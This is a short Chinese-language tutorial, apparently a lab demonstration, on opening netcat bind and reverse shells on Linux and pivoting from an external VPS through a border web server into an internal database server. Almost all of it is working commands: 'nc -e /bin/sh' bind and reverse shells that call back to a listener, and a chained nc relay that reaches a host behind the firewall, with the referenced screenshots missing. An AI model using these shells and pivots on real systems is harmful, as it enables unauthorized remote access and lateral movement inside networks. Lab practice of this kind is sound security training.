本次演示在linux环境下
一般用外网机器对内网机器进行访问时,多用反向shell,内网机器与内网机器之间多用正向shell
正向shell
由于内网及其属于边界服务器,因此我们先进行正向shell演示(正向shell是在目标机器上进行监听):
内网机器上命令:nc -lvp 4444 -e /bin/sh
本地机器上命令:nc 10.0.78.41 4444
显示已经连接
进行验证:
说明正向连接成功
反向shell
反向shell是在本地vps上进行监听,目标机器进行连接
本地机器上命令:nc -lvp 9999
内网机器上命令:nc 10.0.78.29 9999 -e /bin/sh
显示已经连接
进行验证:
说明反向连接成功
接下来演练一个外网机器远程反向shell内网机器,以边界服务器为跳板
准备条件:
1.外网机器(vps)
2.边界服务器(web服务器)
3.内网服务器(数据库服务器)
Vps和web服务器,数据库服务器中间隔着一个防火墙lan IP:192.168.101.1
各ip分别如下:
1.外网机器(vps)
2.边界服务器(web服务器)
3.内网服务器(数据库服务器)
接下来
在vps输入命令:nc -lvp 1234
在数据库服务器输入命令:nc -lvp 1234 -e /bin/sh
在web服务器输入命令:nc -v 10.0.78.29 1234 -c “nc -v 192.168.101.103 1234”
显示已经连接
进行验证:
发现此时ip地址为数据库服务器的ip地址,成功